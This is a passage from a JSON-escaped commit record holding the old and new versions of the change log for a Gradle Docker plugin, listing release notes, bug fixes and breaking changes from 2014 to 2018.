158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v4.2.0 (TBA)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n * Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n * Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n * Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n * Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in 